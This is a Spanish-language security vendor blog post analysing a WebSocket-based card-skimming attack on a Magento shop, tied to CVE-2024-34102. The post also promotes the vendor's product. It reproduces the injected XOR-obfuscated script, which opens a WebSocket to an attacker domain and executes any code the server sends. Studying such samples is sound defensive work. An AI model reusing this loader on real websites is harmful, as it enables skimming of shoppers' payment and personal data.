Blog

Nuevas TTPs para el robo de PII e información financiera en sitios web Magento

En cside, monitorizamos activamente los ataques a la cadena de suministro del lado del cliente, con especial atención a las tácticas, técnicas y procedimientos (TTPs) en evolución utilizados por los actores de amenazas. Uno de los ataques más frecuentes que hemos observado en los últimos meses es el dirigido a sitios web de comercio electrónico construidos sobre el framework Magento. En particular, hemos seguido de cerca el ataque Cosmic Sting (CVE-2024-34102), ampliamente documentado, incluso por Sansec (https://sansec.io/research/cosmicsting). TTP Reciente Observ

Oct 14, 2024 • 5 min read

Simon Wijckmans Founder & CEO

websockets-found-stealing-pii-image-coverr

Uno de los ataques más frecuentes que hemos observado en los últimos meses es el dirigido a sitios web de comercio electrónico construidos sobre el framework Magento.

En particular, hemos seguido de cerca el ataque Cosmic Sting (CVE-2024-34102), ampliamente documentado, incluso por Sansec (https://sansec.io/research/cosmicsting).

TTP Reciente Observada Tradicionalmente, estos ataques han consistido en la inyección de JavaScript (JS) de terceros para crear una capa superpuesta que roba información de tarjetas de crédito (CC) y exfiltra datos sensibles.

Sin embargo, ayer mismo (domingo 13 de octubre), observamos una TTP novedosa e intrigante en la que el atacante adoptó un enfoque diferente.

En lugar de cargar directamente JavaScript malicioso en el sitio Magento, estableció una conexión WebSocket para comunicarse con un servidor de terceros. Este ataque tuvo como objetivo el sitio web sosessentials.co.uk, que funciona sobre Magento 2.4 (Community).

Durante nuestra investigación, encontramos el siguiente script inyectado en el sitio comprometido:

<script>
const qbq = [93,89,89,16,5,5,77,89,94,75,94,70,73,4,69,88,77,5,64,67,92,69,21,89,69,95,88,73,79,23];
const zep = 42;
window.sss = new WebSocket(String.fromCharCode(...qbq.map(hwo => hwo ^ zep)) + encodeURIComponent(location.href));
window.sss.addEventListener('message', event => {new Function(event.data)()});
</script>

Al decodificar este script ofuscado, descubrimos que establece una conexión WebSocket con la siguiente URL: wss://gstatlc[.]org/jivo?source=.

En el momento del análisis no pudimos obtener respuesta del servidor remoto, pero basándonos en los patrones de ataque observados, creemos que esta conexión estaba probablemente destinada a fines de web skimming, es decir, al robo de datos de clientes como información de tarjetas de crédito.

Detalles del dominio El sitio web remoto, gstatlc.org, fue creado apenas tres días antes, lo cual es una señal de alerta clara de que este dominio forma parte de la infraestructura del atacante.

A continuación se muestran los detalles relevantes del dominio:

Fecha de creación: 2024-10-11
Fecha de expiración: 2025-10-11
Última actualización: 2024-10-11

La nueva tendencia: WebSockets para skimming Este ataque representa una evolución interesante en las TTPs, especialmente a medida que más proveedores de seguridad comienzan a detectar los ataques de inyección de JavaScript más habituales.

En lugar de simplemente cargar JavaScript malicioso a través de HTTP, el atacante estableció una conexión WebSocket (protocolo WSS) para cargar scripts y posiblemente otros datos de forma remota. Esto añade complejidad al ataque, ya que los WebSockets proporcionan comunicación bidireccional en tiempo real que puede ser más difícil de detectar e inspeccionar que las peticiones HTTP convencionales.

¿Por qué WebSockets?

Algunos aspectos destacables del uso de WebSockets (WSS) en ataques incluyen:

Comunicación en tiempo real: Los WebSockets permiten una comunicación continua y bidireccional entre el cliente y el servidor remoto, lo que facilita la exfiltración de datos o la modificación de scripts al vuelo. Evasión de defensas tradicionales: Muchas defensas web y políticas de seguridad de contenido (CSPs) están orientadas a bloquear cargas de recursos basadas en HTTP.

Los WebSockets, al utilizar el protocolo WSS, pueden evadir la detección si no se monitorizan adecuadamente. Menor dependencia de recargas de página: A diferencia de los métodos tradicionales, en los que los atacantes dependían de la inyección de scripts para robar datos durante cargas de página o interacciones del usuario, los WebSockets permiten la monitorización continua y la exfiltración de datos sensibles sin necesidad de que el usuario recargue la página o navegue a otra.

El enfoque de cside para la protección del lado del cliente

En cside, adoptamos un papel activo en la protección de nuestros usuarios frente a amenazas del lado del cliente en constante evolución, como la descrita anteriormente. Una de las estrategias clave que empleamos es el proxying de archivos JavaScript para su análisis. Con ello, podemos interceptar e inspeccionar los archivos JavaScript que los sitios web intentan cargar desde servidores remotos, garantizando que son seguros y están libres de contenido malicioso.

Este enfoque ha supuesto una mejora del 30 % en la detección e interceptación de archivos JavaScript remotos antes de que se ejecuten en los navegadores de los usuarios. Cabe destacar que nuestro sistema garantiza que no se cargue ningún JS malicioso, lo que previene eficazmente ataques como el skimming de tarjetas de crédito y la exfiltración de datos.

Nuestro enfoque en la monitorización de la actividad del lado del cliente garantiza que los usuarios de cside estén protegidos frente a este tipo de ataques sofisticados. Monitorizamos, analizamos y bloqueamos continuamente los scripts dañinos antes de que puedan causar daño, proporcionando una capa adicional de seguridad a nuestros usuarios y asegurando que su información sensible permanezca protegida.

Al anticiparnos a las nuevas TTPs y adaptarnos a ellas, garantizamos que nuestros usuarios siempre vayan un paso por delante de los atacantes, protegiendo sus entornos en línea frente a amenazas como este ataque de skimming basado en WebSockets.

Founder & CEO Simon Wijckmans

Founder and CEO of cside. Previously a product manager on Cloudflare Page Shield (now Cloudflare Client-Side Security). Co-chair of the W3C Anti-Fraud Community Group and a Forbes 30 Under 30 honoree. Building accessible security against client-side attacks — web security is not an enterprise-only problem.

Don't just take our word for it, ask AI

Monitoriza y Asegura tus Scripts de Terceros

Gain full visibility and control over every script delivered to your users to enhance site security and performance.

Reservar una demo

Comenzar gratis

Comienza gratis, o prueba Business con una prueba de 14 días.

Interfaz del panel de cside mostrando monitorización de scripts y análisis de seguridad

Portada oscura del blog de cside con una onda de pixeles azules y una lista sobre pixeles no autorizados en sitios de juego y responsabilidad bajo el GDPR

GDPR y juego en línea: por qué los píxeles no autorizados crean un problema de doble responsabilidad

Píxeles no autorizados en sitios de juego crean responsabilidad GDPR y bloqueos de cuentas publicitarias a la vez, aunque el operador no los instale.

Cómo Bloquear Bytespider (el Rastreador de IA de TikTok)

Bytespider rastrea tu sitio para los sistemas de IA de Bytedance. Aprende a bloquearlo con robots.txt y rangos de IP, y las claves de soberanía de datos.

Portada oscura del blog con tres métodos de ataque de scripts maliciosos: redireccionamientos desde el browser, contenedores GTM en la sombra con etiquetas maliciosas y payloads móviles geoespecíficos

Cómo los scripts maliciosos secuestran el recorrido de los jugadores de casino

Scripts inyectados redirigen a jugadores de casino antes del lobby. Las herramientas de red no los detectan. Así debe funcionar la detección.

Portada oscura del blog de cside con una onda de pixeles azules y una lista sobre seguridad de scripts para operadores de juego en APAC

Seguridad de scripts del lado del cliente para operadores de juego en línea en APAC

Cómo los operadores de juego en línea de APAC en Japón, Singapur, Filipinas y Australia pueden monitorizar scripts de terceros en sesiones reales.

Cómo Bloquear Amazon Buy for Me en Tu Sitio Web

Amazon Buy for Me compra en tu sitio para usuarios de Prime. Aprende cómo recopila datos de precios y productos y cómo la detección en el navegador te da control.

Prevención de account takeover: el playbook completo de 2026

El playbook operativo de ATO para 2026: un modelo integral para login, recuperación, sesión y defensa post-auth frente a la apropiación impulsada por agentes IA y bots.

Portada oscura del blog de cside con una onda de pixeles azules y una lista sobre scripts de afiliados comprometidos que roban ingresos de casinos

Cómo los scripts de afiliados comprometidos roban los ingresos de los casinos en línea

Scripts de afiliados comprometidos redirigen jugadores y roban comisiones en páginas de casino, de forma silenciosa y a escala.

Portada oscura del blog con tres vectores de ataque de extensiones del browser: redirecciones a clones de phishing, robo de tokens de sesión y reescritura de campos de pago en el DOM

Cómo las extensiones del browser atacan a los jugadores de casino en línea: qué pueden hacer los operadores

Las extensiones del browser pueden robar tokens de sesión y secuestrar pagos en casinos. Así atacan, por qué los servidores no lo ven y cómo detectarlas.

Cómo Bloquear la Creación de Cuentas Falsas con IA

Los agentes de IA crean cuentas falsas con un comportamiento humano que vence al CAPTCHA. Aprende las señales del navegador que delatan los registros automatizados.

Cómo Bloquear CCBot (el Rastreador de IA de Common Crawl)

CCBot alimenta los conjuntos de datos de Common Crawl usados para entrenar GPT-3, BLOOM, LLaMA y muchos otros modelos de IA. Aprende cómo bloquearlo y qué consigue realmente bloquearlo.